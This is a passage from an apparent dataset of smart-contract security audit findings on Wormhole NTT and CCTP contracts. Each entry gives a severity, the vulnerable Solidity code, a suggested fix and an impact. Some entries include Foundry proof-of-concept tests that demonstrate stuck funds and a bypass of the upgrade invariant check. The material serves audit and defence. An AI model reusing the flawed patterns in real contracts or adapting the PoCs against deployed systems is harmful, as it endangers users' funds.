TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n","```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n" +Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completion,high,"When a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\n",Consider passing no instructions into the delivery price estimation when the Transceiver index does not exist.,"Missing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = ""https://goerli.blockpi.network/v1/rpc/public"";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), """")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), """"))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), """"))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), """"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), """")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), """"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() != 0, ""Threshold is zero with active transceivers"");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n","```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n" +Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassed,medium,"Within `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\\n );\\n}\\n```\\n",Explicitly check the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.,"A silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified a MEDIUM severity finding.","```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n" +Disabled Transceivers cannot be re-enabled by calling `TransceiverRegistry::_setTransceiver` after 64 have been registered,medium,"`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for the re-enabling of previously registered but currently disabled Transceivers.\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n\\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. Assuming a total of 64 registered Transceivers, with some of these Transceivers having been previously disabled, the placement of this latter validation will prevent a disabled Transceiver from being re-enabled since the subsequent block in which the storage indicating its enabled state is set to `true` is not reachable. Consequently, it will not be possible to re-enable any disabled transceivers after having registered the maximum number of Transceivers, meaning that this function will never be callable without redeployment.",Move the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.,"Under normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.",```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n +NTT Manager cannot be unpaused once paused,medium,"`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n",```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n,"The inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.",```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n +Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgrades,medium,"Transceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.","Consider making `Transceiver::_checkImmutables` and `Implementation::_setMigratesImmutables` private functions for Transceivers. If the `_checkImmutables()` function has to be overridden, consider exposing another function that is called inside `_checkImmutables` as follows:\\n```\\nfunction _checkImmutables() private view override {\\n assert(this.nttManager() == nttManager);\\n assert(this.nttManagerToken() == nttManagerToken);\\n _checkAdditionalImmutables();\\n}\\n\\nfunction _checkAdditionalImmutables() private view virtual override {}\\n```\\n","While this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is prescient to note.\\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed to reflect the `true` functionality.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), """")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr(""new transceiver owner""));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr(""new ntt manager owner""));\\n}\\n```\\n","```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n" +Asymmetry in Transceiver pausing capability,low,"Pausing functionality is exposed via Transceiver::_pauseTransceiver; however, there is no corresponding function that exposes unpausing functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n",```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n,"While not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.",```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n +Incorrect Transceiver payload prefix definition,low,"The `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, which is output when running the following command:\\n```\\ncast --from-utf8 ""EWH""\\n```\\n",Update the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\n,"While still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.",```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n +Redemptions are blocked when L2 sequencers are down,medium,"Given that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n",Validation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.,"Failure to consider the aliased `mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.","```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n" +Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`,low,"`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the `length` of the `encoded` bytes parameter `encoded` itself. If the `length` of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (""memory-safe"") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting `for` its `length` and accompanying `shift` calculation depending on the `length` supplied, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. Therefore, regardless of the `length` of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.","Consider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.","The impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. This latter function is utilized in two places:","```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (""memory-safe"") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n" +A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`,low,"`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given 